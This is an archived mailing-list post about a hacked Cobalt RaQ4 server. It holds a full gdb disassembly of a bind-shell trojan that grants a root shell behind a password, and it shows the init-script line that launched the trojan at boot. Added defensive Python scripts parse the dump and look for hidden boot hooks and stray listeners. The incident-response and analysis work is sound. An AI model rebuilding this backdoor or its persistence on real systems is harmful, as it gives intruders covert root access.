[cobalt-users] RaQ4 -- Another Hacking Story
- Subject: [cobalt-users] RaQ4 -- Another Hacking Story
- From: "Bill" <bill@xxxxxxxxxxxxxxxxxxxx>
- Date: Thu Feb 15 12:05:00 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Hi List Members,
I wanted to throw my recent 'I've Been Hacked!' story onto the list.
Hopefully, this may help someone to avoid the pain of a server rebuild.
Luckily, we backup our data regularly.
This started about a week ago. One of our RaQ4s stopped responding to web
requests. I SSHd in and rebooted. Then telnet/ssh went down. Had to 'hard
boot' from the console. All seemed well, but I did a pstree command and
noted that httpd was not running. I attempted a restart and got an error
about httpd logs missing. In fact, the entire /var/log file was gone! So,
I peeked at our other RaQ4s to compare the log files and re-created these
missing logs from scratch. After that, httpd came up.
But, then, I noticed an alarmingly high number of instances of a process
called .bd when I did a pstree command. I'm talking over 400 processes at
this point with a load average between 2.50 - 4.00 and CPU usage of 99.9%!
Okay, I
knew something was up now. I did a locate command and found the file (see
Email to Cobalt below). I got rid of the file and the .bd process did not
come back. However, the hacker was not through. He began using our server
to scan other web servers, including one with the US Navy! When the Navy
calls and asks you to cut out the port scanning -- you just do it. So, we
rebuilt the server.
I've installed PortSentry and all patches are updated. I hope this never
happens again. I will tell you, if you do not yet backup your files on a
regular basis, I strongly urge you to start right away. If I had lost site
files for 200 customer web sites--- I can only imagine the 'pain' that would
cause.
Bill
------------------ Email To Cobalt ----------------------
Mark,
The following is a copy of the file. It was located in /usr/doc/.bd and
was being called from
vi /etc/rc.d/init.d/functions
by an additional line at the end of that file: /usr/doc/.bd
The result of this file was that over 300 processes of .bd were running at
one time and the load average increased dramatically.
---------------- Email From Cobalt -------------------
Hi Bill!
Enclosed is a disassembly of the program that you sent me. I've got some
bad news. It is indeed a trojan. Specifically it is a trojan that listens
on port 31337 that spawns a shell for any user connecting to that port. It
looks pretty simple and if you've ever done any 'C' programming the dump
should be pretty easy to follow. I would check your RaQ very carefully to
be sure that no other backdoors are installed.
Good luck!
Mark.
(gdb) disassemble main
Dump of assembler code for function main:
0x8048ac4 <main>: push %ebp
0x8048ac5 <main+1>: mov %esp,%ebp
0x8048ac7 <main+3>: sub $0x201c,%esp
0x8048acd <main+9>: call 0x8048a08 <geteuid>
0x8048ad2 <main+14>: mov %eax,%eax
0x8048ad4 <main+16>: test %eax,%eax
0x8048ad6 <main+18>: jne 0x8048b0b <main+71>
0x8048ad8 <main+20>: incl 0x804a1b0
0x8048ade <main+26>: push $0x80490c0
0x8048ae3 <main+31>: call 0x8048988 <getpwnam>
0x8048ae8 <main+36>: add $0x4,%esp
0x8048aeb <main+39>: mov %eax,%eax
0x8048aed <main+41>: mov %eax,0xffffffe4(%ebp)
0x8048af0 <main+44>: cmpl $0x0,0xffffffe4(%ebp)
0x8048af4 <main+48>: je 0x8048b0b <main+71>
0x8048af6 <main+50>: mov 0xffffffe4(%ebp),%eax
0x8048af9 <main+53>: mov 0x8(%eax),%edx
0x8048afc <main+56>: mov %edx,0x804a1b4
0x8048b02 <main+62>: push %edx
0x8048b03 <main+63>: call 0x8048858 <seteuid>
0x8048b08 <main+68>: add $0x4,%esp
0x8048b0b <main+71>: call 0x8048838 <fork>
0x8048b10 <main+76>: mov %eax,%eax
0x8048b12 <main+78>: test %eax,%eax
0x8048b14 <main+80>: je 0x8048b20 <main+92>
0x8048b16 <main+82>: push $0x0
0x8048b18 <main+84>: call 0x8048998 <exit>
0x8048b1d <main+89>: add $0x4,%esp
0x8048b20 <main+92>: mov 0xc(%ebp),%eax
0x8048b23 <main+95>: mov (%eax),%edx
0x8048b25 <main+97>: push %edx
0x8048b26 <main+98>: call 0x80488d8 <strlen>
0x8048b2b <main+103>: add $0x4,%esp
0x8048b2e <main+106>: mov %eax,%eax
0x8048b30 <main+108>: push %eax
0x8048b31 <main+109>: push $0x20
0x8048b33 <main+111>: mov 0xc(%ebp),%eax
0x8048b36 <main+114>: mov (%eax),%edx
0x8048b38 <main+116>: push %edx
0x8048b39 <main+117>: call 0x80489d8 <memset>
0x8048b3e <main+122>: add $0xc,%esp
0x8048b41 <main+125>: push $0x80490c5
0x8048b46 <main+130>: mov 0xc(%ebp),%eax
0x8048b49 <main+133>: mov (%eax),%edx
0x8048b4b <main+135>: push %edx
0x8048b4c <main+136>: call 0x8048a18 <strcpy>
0x8048b51 <main+141>: add $0x8,%esp
0x8048b54 <main+144>: push $0x0
0x8048b56 <main+146>: push $0x1
0x8048b58 <main+148>: push $0x2
0x8048b5a <main+150>: call 0x80489f8 <socket>
0x8048b5f <main+155>: add $0xc,%esp
0x8048b62 <main+158>: mov %eax,%eax
0x8048b64 <main+160>: mov %eax,0xfffffffc(%ebp)
0x8048b67 <main+163>: cmpl $0x0,0xfffffffc(%ebp)
0x8048b6b <main+167>: jge 0x8048b6d <main+169>
0x8048b6d <main+169>: push $0x10
0x8048b6f <main+171>: lea 0xffffffe8(%ebp),%eax
0x8048b72 <main+174>: push %eax
0x8048b73 <main+175>: call 0x8048978 <bzero>
0x8048b78 <main+180>: add $0x8,%esp
0x8048b7b <main+183>: movw $0x2,0xffffffe8(%ebp)
0x8048b81 <main+189>: push $0xc97
0x8048b86 <main+194>: call 0x80489b8 <htons>
0x8048b8b <main+199>: add $0x4,%esp
0x8048b8e <main+202>: mov %eax,%eax
0x8048b90 <main+204>: mov %ax,0xffffffea(%ebp)
0x8048b94 <main+208>: push $0x0
0x8048b96 <main+210>: call 0x8048868 <htonl>
0x8048b9b <main+215>: add $0x4,%esp
0x8048b9e <main+218>: mov %eax,%eax
0x8048ba0 <main+220>: mov %eax,0xffffffec(%ebp)
0x8048ba3 <main+223>: push $0x10
0x8048ba5 <main+225>: lea 0xffffffe8(%ebp),%edx
0x8048ba8 <main+228>: mov %edx,%eax
0x8048baa <main+230>: push %eax
0x8048bab <main+231>: mov 0xfffffffc(%ebp),%eax
0x8048bae <main+234>: push %eax
0x8048baf <main+235>: call 0x8048938 <bind>
0x8048bb4 <main+240>: add $0xc,%esp
0x8048bb7 <main+243>: mov %eax,%eax
0x8048bb9 <main+245>: test %eax,%eax
0x8048bbb <main+247>: jge 0x8048bbd <main+249>
0x8048bbd <main+249>: push $0x5
0x8048bbf <main+251>: mov 0xfffffffc(%ebp),%eax
0x8048bc2 <main+254>: push %eax
0x8048bc3 <main+255>: call 0x80488a8 <listen>
0x8048bc8 <main+260>: add $0x8,%esp
0x8048bcb <main+263>: mov %eax,%eax
0x8048bcd <main+265>: test %eax,%eax
0x8048bcf <main+267>: jge 0x8048bd1 <main+269>
0x8048bd1 <main+269>: nop
0x8048bd2 <main+270>: mov %esi,%esi
0x8048bd4 <main+272>: push $0x0
0x8048bd6 <main+274>: xor %eax,%eax
0x8048bd8 <main+276>: push %eax
0x8048bd9 <main+277>: mov 0xfffffffc(%ebp),%eax
0x8048bdc <main+280>: push %eax
0x8048bdd <main+281>: call 0x8048888 <accept>
0x8048be2 <main+286>: add $0xc,%esp
0x8048be5 <main+289>: mov %eax,%eax
0x8048be7 <main+291>: mov %eax,0xfffffff8(%ebp)
0x8048bea <main+294>: cmpl $0x0,0xfffffff8(%ebp)
0x8048bee <main+298>: jge 0x8048bf8 <main+308>
0x8048bf0 <main+300>: jmp 0x8048cb4 <main+496>
0x8048bf5 <main+305>: lea 0x0(%esi),%esi
0x8048bf8 <main+308>: call 0x8048838 <fork>
0x8048bfd <main+313>: mov %eax,%eax
0x8048bff <main+315>: test %eax,%eax
0x8048c01 <main+317>: je 0x8048ca8 <main+484>
0x8048c07 <main+323>: push $0x0
0x8048c09 <main+325>: mov 0xfffffff8(%ebp),%eax
0x8048c0c <main+328>: push %eax
0x8048c0d <main+329>: call 0x8048918 <dup2>
0x8048c12 <main+334>: add $0x8,%esp
0x8048c15 <main+337>: push $0x1
0x8048c17 <main+339>: mov 0xfffffff8(%ebp),%eax
0x8048c1a <main+342>: push %eax
0x8048c1b <main+343>: call 0x8048918 <dup2>
0x8048c20 <main+348>: add $0x8,%esp
0x8048c23 <main+351>: push $0x2
0x8048c25 <main+353>: mov 0xfffffff8(%ebp),%eax
0x8048c28 <main+356>: push %eax
0x8048c29 <main+357>: call 0x8048918 <dup2>
0x8048c2e <main+362>: add $0x8,%esp
0x8048c31 <main+365>: mov 0xfffffff8(%ebp),%eax
0x8048c34 <main+368>: push %eax
0x8048c35 <main+369>: call 0x8048818 <close>
0x8048c3a <main+374>: add $0x4,%esp
0x8048c3d <main+377>: lea 0xffffdfe4(%ebp),%eax
0x8048c43 <main+383>: push %eax
0x8048c44 <main+384>: call 0x8048878 <gets>
0x8048c49 <main+389>: add $0x4,%esp
0x8048c4c <main+392>: lea 0xffffdfe4(%ebp),%eax
0x8048c52 <main+398>: push %eax
0x8048c53 <main+399>: call 0x80488d8 <strlen>
0x8048c58 <main+404>: add $0x4,%esp
0x8048c5b <main+407>: mov %eax,%eax
0x8048c5d <main+409>: lea 0xffffffff(%eax),%edx
0x8048c60 <main+412>: lea 0xffffdfe4(%ebp),%eax
0x8048c66 <main+418>: movb $0x0,(%edx,%eax,1)
0x8048c6a <main+422>: lea 0xffffdfe4(%ebp),%eax
0x8048c70 <main+428>: push %eax
0x8048c71 <main+429>: push $0x80490cf
0x8048c76 <main+434>: call 0x8048808 <strcmp>
0x8048c7b <main+439>: add $0x8,%esp
0x8048c7e <main+442>: mov %eax,%eax
0x8048c80 <main+444>: test %eax,%eax
0x8048c82 <main+446>: jne 0x8048c9d <main+473>
0x8048c84 <main+448>: push $0x2000
0x8048c89 <main+453>: lea 0xffffdfe4(%ebp),%eax
0x8048c8f <main+459>: push %eax
0x8048c90 <main+460>: call 0x8048978 <bzero>
0x8048c95 <main+465>: add $0x8,%esp
0x8048c98 <main+468>: call 0x8048dac <run_shell>
0x8048c9d <main+473>: push $0x0
0x8048c9f <main+475>: call 0x8048998 <exit>
0x8048ca4 <main+480>: add $0x4,%esp
0x8048ca7 <main+483>: nop
0x8048ca8 <main+484>: mov 0xfffffff8(%ebp),%eax
0x8048cab <main+487>: push %eax
0x8048cac <main+488>: call 0x8048818 <close>
0x8048cb1 <main+493>: add $0x4,%esp
0x8048cb4 <main+496>: jmp 0x8048bd4 <main+272>
0x8048cb9 <main+501>: lea 0x0(%esi),%esi
0x8048cbc <main+504>: push $0x0
0x8048cbe <main+506>: call 0x8048998 <exit>
0x8048cc3 <main+511>: add $0x4,%esp
0x8048cc6 <main+514>: mov %esi,%esi
0x8048cc8 <main+516>: leave
0x8048cc9 <main+517>: ret
0x8048cca <main+518>: mov %esi,%esi
End of assembler dump.
(gdb) disassemble run_shell
Dump of assembler code for function run_shell:
0x8048dac <run_shell>: push %ebp
0x8048dad <run_shell+1>: mov %esp,%ebp
0x8048daf <run_shell+3>: sub $0x2000,%esp
0x8048db5 <run_shell+9>: push $0x804912f
0x8048dba <run_shell+14>: call 0x80488c8 <chdir>
0x8048dbf <run_shell+19>: add $0x4,%esp
0x8048dc2 <run_shell+22>: mov %esi,%esi
0x8048dc4 <run_shell+24>: call 0x8048ccc <show_prompt>
0x8048dc9 <run_shell+29>: lea 0xffffe000(%ebp),%eax
0x8048dcf <run_shell+35>: push %eax
0x8048dd0 <run_shell+36>: call 0x8048878 <gets>
0x8048dd5 <run_shell+41>: add $0x4,%esp
0x8048dd8 <run_shell+44>: lea 0xffffe000(%ebp),%eax
0x8048dde <run_shell+50>: push %eax
0x8048ddf <run_shell+51>: call 0x80488d8 <strlen>
0x8048de4 <run_shell+56>: add $0x4,%esp
0x8048de7 <run_shell+59>: mov %eax,%eax
0x8048de9 <run_shell+61>: lea 0xffffffff(%eax),%edx
0x8048dec <run_shell+64>: lea 0xffffe000(%ebp),%eax
0x8048df2 <run_shell+70>: movb $0x0,(%edx,%eax,1)
0x8048df6 <run_shell+74>: push $0x0
0x8048df8 <run_shell+76>: call 0x8048858 <seteuid>
0x8048dfd <run_shell+81>: add $0x4,%esp
0x8048e00 <run_shell+84>: lea 0xffffe000(%ebp),%eax
0x8048e06 <run_shell+90>: push %eax
0x8048e07 <run_shell+91>: call 0x8048e24 <execute>
0x8048e0c <run_shell+96>: add $0x4,%esp
0x8048e0f <run_shell+99>: mov 0x804a1b4,%eax
0x8048e14 <run_shell+104>: push %eax
0x8048e15 <run_shell+105>: call 0x8048858 <seteuid>
0x8048e1a <run_shell+110>: add $0x4,%esp
0x8048e1d <run_shell+113>: jmp 0x8048dc4 <run_shell+24>
0x8048e1f <run_shell+115>: nop
0x8048e20 <run_shell+116>: leave
0x8048e21 <run_shell+117>: ret
0x8048e22 <run_shell+118>: mov %esi,%esi
End of assembler dump.
(gdb)
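Reading the dump above in order: main() overwrites its own argv[0] (memset to spaces, then strcpy of a fixed string, so ps shows whatever name the author chose), forks into the background, calls socket(2, 1, 0) (AF_INET, SOCK_STREAM), binds INADDR_ANY on the port pushed to htons, listens with backlog 5, and for every accepted client forks, dup2()s the socket onto fds 0-2, reads one line with gets() and strcmp()s it against a fixed string before calling run_shell; run_shell loops reading a line, seteuid(0), execute(), then seteuid back to the uid saved at startup. Two things a practitioner would check rather than take from the cover note: the immediate pushed to htons is $0xc97, which is 3223 decimal, and the connection is gated on a fixed password string at 0x80490cf. The script below is an added example, not part of the post or anything Cobalt shipped: it pulls those parameters out of a gdb dump mechanically by pairing each call with the immediates pushed before it (cdecl pushes the last C argument first, so reversing the push order gives C argument order). DUMP is an excerpt of the dump above; the output field names are my own.

```python
import re

# Excerpt of the gdb dump from the post (socket setup and the password
# check in main), embedded here so the script runs stand-alone.
DUMP = """\
0x8048b54 <main+144>: push $0x0
0x8048b56 <main+146>: push $0x1
0x8048b58 <main+148>: push $0x2
0x8048b5a <main+150>: call 0x80489f8 <socket>
0x8048b5f <main+155>: add $0xc,%esp
0x8048b7b <main+183>: movw $0x2,0xffffffe8(%ebp)
0x8048b81 <main+189>: push $0xc97
0x8048b86 <main+194>: call 0x80489b8 <htons>
0x8048b8b <main+199>: add $0x4,%esp
0x8048bbd <main+249>: push $0x5
0x8048bbf <main+251>: mov 0xfffffffc(%ebp),%eax
0x8048bc2 <main+254>: push %eax
0x8048bc3 <main+255>: call 0x80488a8 <listen>
0x8048bc8 <main+260>: add $0x8,%esp
0x8048c70 <main+428>: push %eax
0x8048c71 <main+429>: push $0x80490cf
0x8048c76 <main+434>: call 0x8048808 <strcmp>
0x8048c7b <main+439>: add $0x8,%esp
0x8048c82 <main+446>: jne 0x8048c9d <main+473>
0x8048c98 <main+468>: call 0x8048dac <run_shell>
"""

# One gdb line: "0xADDR <sym+off>: mnemonic operands"
INSN = re.compile(r"^0x[0-9a-f]+\s+<[^>]+>:\s+(\w+)\s*(.*)$")


def parse_calls(dump):
    """Walk the dump in order and pair each call with the arguments pushed
    before it. Immediate pushes ($0x..) are decoded; register pushes become
    None because their value is not knowable from the listing alone."""
    pushed = []
    calls = []
    for line in dump.splitlines():
        m = INSN.match(line.strip())
        if not m:
            continue
        mnemonic, operands = m.groups()
        if mnemonic == "push":
            pushed.append(int(operands[1:], 16) if operands.startswith("$") else None)
        elif mnemonic == "call":
            name = re.search(r"<(\w+)>", operands).group(1)
            calls.append((name, list(reversed(pushed))))  # C argument order
            pushed = []
        elif mnemonic == "add" and "%esp" in operands:
            pushed = []  # caller popped its arguments; nothing pending
    return calls


AF_NAMES = {2: "AF_INET"}
SOCK_NAMES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}


def summarize_listener(dump):
    """Reduce the call sequence to the facts an incident responder wants:
    address family, socket type, listening port, backlog, and whether a
    fixed-string strcmp stands between accept() and the command loop."""
    calls = parse_calls(dump)
    names = [name for name, _ in calls]
    info = {}
    for name, args in calls:
        if name == "socket":
            info["family"] = AF_NAMES.get(args[0], args[0])
            info["type"] = SOCK_NAMES.get(args[1], args[1])
        elif name == "htons":
            info["port"] = args[0]  # immediate is already host byte order
        elif name == "listen":
            info["backlog"] = args[1]
        elif name == "strcmp" and isinstance(args[0], int):
            info["password_string_addr"] = hex(args[0])
    # strcmp against a constant, followed by the run_shell call, means the
    # backdoor demands a password before handing over its command loop.
    info["password_gated"] = ("strcmp" in names and "run_shell" in names
                              and names.index("strcmp") < names.index("run_shell"))
    return info


if __name__ == "__main__":
    for key, value in summarize_listener(DUMP).items():
        print(f"{key}: {value}")
```

The same pairing trick works on the run_shell dump: the push $0x0 before the first seteuid and the mov 0x804a1b4,%eax before the second show the privilege flip around execute(). To recover the password and the spoofed process name, dump the strings at 0x80490cf and 0x80490c5 with `x/s` in gdb on the sample, not by connecting to the listener: the password is read with gets() into a stack buffer, and the binary is not something to exercise live.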
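The persistence Bill describes (a hidden executable /usr/doc/.bd started by an extra line appended to /etc/rc.d/init.d/functions) and the listener Mark identified are both checkable from raw files rather than from a possibly-trojaned ps or netstat, which matters once /var/log has been wiped. The script below is an added example, not from the post or from Cobalt: it flags non-comment lines in an init script that invoke a dot-file path, and parses /proc/net/tcp for sockets in LISTEN state so that anything outside an allow-list stands out. The SAMPLE_* inputs are constructed to mirror the post (a boot script with the trailing /usr/doc/.bd line, and a socket table with sshd, one http connection and a listener on 0x0C97); on a real box read the files and pass their contents in.

```python
import re

# Constructed init script with the backdoor's appended line, mirroring what
# the post describes. Not copied from a real RaQ4.
SAMPLE_FUNCTIONS = """\
#!/bin/sh
# functions  This file contains functions to be used by most or all
#            shell scripts in the /etc/init.d directory.
daemon() {
    echo -n "Starting $1: "
    $*
}
killproc() {
    kill `pidof $1`
}
/usr/doc/.bd
"""

# Constructed /proc/net/tcp excerpt: sshd on 22 (st 0A = LISTEN), one
# established http connection (st 01), and an extra listener on 0x0C97.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234
   1: 0A000001:0050 0A000002:C3A1 01 00000000:00000000 00:00000000 00000000     0        0 1235
   2: 00000000:0C97 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1236
"""

# An absolute path whose final component starts with a dot, e.g. /usr/doc/.bd
HIDDEN_PATH = re.compile(r"(?:^|\s)(/(?:[^\s/]+/)*\.[^\s/]+)")


def hidden_exec_lines(script_text):
    """Return (lineno, line) for non-comment lines that reference a dot-file
    path. A hidden executable invoked from a boot script is the persistence
    hook the post describes; legitimate init scripts rarely do this."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if HIDDEN_PATH.search(stripped):
            hits.append((lineno, stripped))
    return hits


def listening_ports(proc_net_tcp_text):
    """Parse /proc/net/tcp and return {port: inode} for LISTEN sockets.
    The local_address column is hex ip:port; st 0A is TCP_LISTEN."""
    listeners = {}
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip header row
        fields = line.split()
        if len(fields) < 10:
            continue
        local, state, inode = fields[1], fields[3], fields[9]
        if state == "0A":
            listeners[int(local.split(":")[1], 16)] = int(inode)
    return listeners


def unexpected_listeners(proc_net_tcp_text, allowed_ports):
    """Listeners not on the allow-list; the inode lets you walk /proc/*/fd
    to find the owning process without trusting ps."""
    return {port: inode for port, inode in listening_ports(proc_net_tcp_text).items()
            if port not in allowed_ports}


if __name__ == "__main__":
    # On a live host: open("/etc/rc.d/init.d/functions").read() and
    # open("/proc/net/tcp").read() in place of the constructed samples.
    for lineno, line in hidden_exec_lines(SAMPLE_FUNCTIONS):
        print(f"init script line {lineno} invokes a hidden path: {line}")
    for port, inode in unexpected_listeners(SAMPLE_PROC_NET_TCP, {22, 80, 443}).items():
        print(f"unexpected listener on port {port} (socket inode {inode})")
```

The inode is the pivot: `ls -l /proc/*/fd 2>/dev/null | grep socket:\[1236\]` names the process holding the socket, which is how you confirm the listener is the .bd binary and not something legitimate. Run the init-script check across every file in /etc/rc.d/init.d and /etc/rc.d/rc.local, not just functions, since the post only tells you where this particular intruder chose to hook in.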